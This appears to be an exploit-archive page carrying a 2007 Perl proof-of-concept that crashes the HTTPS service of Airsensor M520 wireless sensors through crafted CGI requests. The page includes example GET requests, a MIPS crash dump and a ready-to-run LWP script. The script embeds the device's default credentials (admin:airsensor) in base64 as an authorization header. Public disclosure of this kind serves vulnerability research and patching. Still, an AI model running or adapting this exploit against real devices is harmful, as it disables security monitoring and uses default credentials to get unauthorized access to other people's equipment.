airsensor-dos.txt

airsensor-dos.txt: Posted Sep 19, 2007; Authored by Alex Hernandez; Airsensor M520 httpd remote preauth denial of service buffer overflow proof of concept exploit.; tags | exploit, remote, denial of service, overflow, proof of concept; SHA-256 | 392a2c06e846eb34be94f8491f3cd9e418fb9922ce9d10cb8550bc8ea7efb3db; Download | Favorite | View

airsensor-dos.txt

#!/usr/bin/perl -w
#                  
# Airsensor M520 HTTPD Remote Preauth Denial Of Service and Buffer Overflow PoC    
#                  
# The vulnerability is caused due to an unspecified error in the cgis  
# files filter used for configure propierties. This can be exploited by  
# sending a specially crafted HTTPS request (necessary authentication), 
# which will cause the HTTPS service on the system to crash.    
#                  
# Requisites: "Use DHCP" option interface mark "No"    
#                  
# Examples:                
#                   
# GET https://192.168.100.100/adLog.cgi?%41%41%41 HTTP/1.1    
# GET https://192.168.100.100/post.cgi?%41%41%41 HTTP/1.1    
# GET https://192.168.100.100/ad.cgi?%41%41%41 HTTP/1.1      
#                   
# Pinging:                
#                  
# Before:                
#                  
# Reply from 192.168.100.100: bytes=32 time<1ms TTL=64      
# Reply from 192.168.100.100: bytes=32 time<1ms TTL=64      
# Reply from 192.168.100.100: bytes=32 time<1ms TTL=64      
#                  
# After:                
#                  
# Hardware error.              
# Hardware error.              
# Hardware error.              
# Request timed out.              
# Request timed out.              
# Request timed out.              
#                  
# C:\>nc -vvn 192.168.100.100 443          
# (UNKNOWN) [192.168.100.100] 443 (?): connection refused    
# sent 0, rcvd 0: NOTSOCK            
#
# Buffer Overflow debug log:
#
# 1970-01-01 00:00:15   SYS-INFO:: AirDefense Firmware Version 4.4.1.4, Model = M520
# 1970-01-01 00:00:15   SYS-CRIT:: SENSOR EXCEPTION ERROR
# 1970-01-01 00:00:15   SYS-CRIT:: SENSOR VERSION NUMBER: 4.4.1.4
# 1970-01-01 00:00:15   SYS-CRIT:: SENSOR Up Time:  00:08:51
# 1970-01-01 00:00:15   SYS-CRIT:: Time of Exception: 1970-01-01 00:08:55
# 1970-01-01 00:00:15   SYS-CRIT:: Exception ID = 10 ( Reserved Instruction)
# 1970-01-01 00:00:15   SYS-CRIT:: Thread = HTTPD
# 1970-01-01 00:00:15   SYS-CRIT:: MIPS Register Dump:
# 1970-01-01 00:00:15   SYS-CRIT::  zero=0x00000000    at=0xfffffffe    v0=0x00000000    v1=0x00000000
# 1970-01-01 00:00:16   SYS-CRIT::    a0=0x00000000    a1=0x3d000000    a2=0x00000010    a3=0x00000041
# 1970-01-01 00:00:16   SYS-CRIT::    t0=0x00000000    t1=0x0000003d    t2=0x0000000b    t3=0x00000000
# 1970-01-01 00:00:16   SYS-CRIT::    t4=0x802f799c    t5=0xf43dd40f    t6=0x0066a1a4    t7=0x4df0e494
# 1970-01-01 00:00:16   SYS-CRIT::    s0=0x802f7dbf    s1=0x0000001f    s2=0x802f7910    s3=0x80120000
# 1970-01-01 00:00:16   SYS-CRIT::    s4=0x80120000    s5=0x80986c30    s6=0x80120000    s7=0x80128afc
# 1970-01-01 00:00:16   SYS-CRIT::    t8=0x480ec8cd    t9=0x742b7136    k0=0x802f78c8    k1=0x802f7910
# 1970-01-01 00:00:16   SYS-CRIT::    gp=0x8015b070    sp=0x802f7910    fp=0x80128aec    ra=0x800b2534
# 1970-01-01 00:00:16   SYS-CRIT:: Address of instruction that caused exception = 0x800b2534
# 1970-01-01 00:00:16   SYS-CRIT:: Memory address at which adress exception occured = 0x00000000
# 1970-01-01 00:00:16   SYS-CRIT:: Return address = 0x800b2534
# 1970-01-01 00:00:17   SYS-CRIT:: Status Reg = 0x1000af03
# 1970-01-01 00:00:17   SYS-CRIT:: Cache Reg = 0x00000000
# 1970-01-01 00:00:17   SYS-CRIT:: Cause Reg = 0x30000028
# 1970-01-01 00:00:17   SYS-CRIT:: Config Reg = 0x03fffbfb
# 1970-01-01 00:00:17   SYS-CRIT:: Vector = 40
# 1970-01-01 00:00:17   SYS-CRIT:: Processor Version = 0x00018009
# 1970-01-01 00:00:17   SYS-CRIT:: Stack Trace Begin: "->" = return address
# 1970-01-01 00:00:17   SYS-CRIT::   [802f7910]=0x802f7dbf
# 1970-01-01 00:00:17   SYS-CRIT::   [802f7914]=0x00000000
# 1970-01-01 00:00:17   SYS-CRIT::   [802f7918]=0x00000000
# 1970-01-01 00:00:19   SYS-CRIT::   [802f7990]=0x80130000
# 1970-01-01 00:00:19   SYS-CRIT::   [802f7994]=0x802f7db4
# 1970-01-01 00:00:19   SYS-CRIT::   [802f7998]=0x80152e18
# 1970-01-01 00:00:19   SYS-CRIT::   [802f799c]=0x80152ed8
# 1970-01-01 00:00:19   SYS-CRIT::   [802f79a0]=0x802f7dbf
# 1970-01-01 00:00:19   SYS-CRIT::   [802f79a4]=0x80986c30
# 1970-01-01 00:00:19   SYS-CRIT::   [802f79a8]=0x802f8200
# 1970-01-01 00:00:19   SYS-CRIT:: ->[802f79ac]=0x800f0450  <- return address
# 1970-01-01 00:00:19   SYS-CRIT::   [802f79b0]=0x0d0a0074
# 1970-01-01 00:00:21   SYS-CRIT:: Stack Trace End:
#                  
# The vulnerability has been reported in versions Airdefense    
#
# Firmware Version 4.3.1.1, Model = M520
# Firmware version 4.4.1.4, Model = M520        
# 
# More information:   http://www.airdefense.net
#      http://support.airdefense.net
#
# Very special credits: str0ke, Kf, rathaous, !dsr, 0dd.
#        
# and friends: nitr0us, crypkey, dex, xdawn, sirdarckcat, kuza55, 
# pikah, codebreak, h3llfyr3
#          
# Alex Hernandez ahernandez [at] sybsecurity dot com
#

use strict;
use LWP;
use Data::Dumper;
require HTTP::Request;
require HTTP::Headers;

my $string =   "%41%41%41";      # Strings to send
my $method =   'GET';        # Method "GET" or "POST"
my $uri =   'https://192.168.100.100';  # Factory default IP address 
my $content =   "/adLog.cgi?";      # Cgi's file to crash

#my $content =   "/ad.cgi?";
#my $content =   "/post.cgi?";
#my $content =   "/logout.cgi?";

my $headers = HTTP::Headers->new(

'Host:'                  => '192.168.100.100',
'User-Agent:'            => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6',
'Accept:'                => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5',
'Accept-Language:'       => 'en-us,en;q=0.5',
'Accept-Charset:'     => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',     
'Keep-Alive:'            => '300',
'Connection:'            => 'keep-alive',
'Referer:'         => 'https://192.168.100.100/adLog.cgi?submitButton=refresh&refresh=Refresh',
'Authorization:'  => 'Basic YWRtaW46YWlyc2Vuc29y', # base64 encode admin:airsensor

);

my $request = HTTP::Request->new($method, $uri, $headers, $content, $string);

my $ua = LWP::UserAgent->new;
my $response = $ua->request($request);

print "[+] Denial of Service exploit for Airsensor M520 Final\n";
print "[+] Coded by: Alex Hernandez [ahernandez\@sybsecurity.com]\n";
print "[+] We got this response from sensor: \n\n" . $response->content . "\n";

my $data;
  foreach my $pair (split('&', $response->content)) {
     my ($k, $v) = split('=', $pair);
     $data->{$k} = $v;
}

if ($data->{RESULT} != 0) {

  print "[+] Denial of Service exploit for Airsensor M520 Final\n";
  print "[+] Coded by: Alex Hernandez[ahernandez\@sybsecurity.com]\n";
  print "[+] Use:\n";
  print "\tperl -x dos_sensor.pl\n";
   print $data->{RESPMSG} . "\n";
  exit(0);

} else {

   print "[+] Denial of service Exploit successed!!!\n";
  print "[+] By Alex Hernandez[ahernandez\@sybsecurity.com]\n";
}

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

airsensor-dos.txt

airsensor-dos.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

airsensor-dos.txt

Share This

airsensor-dos.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems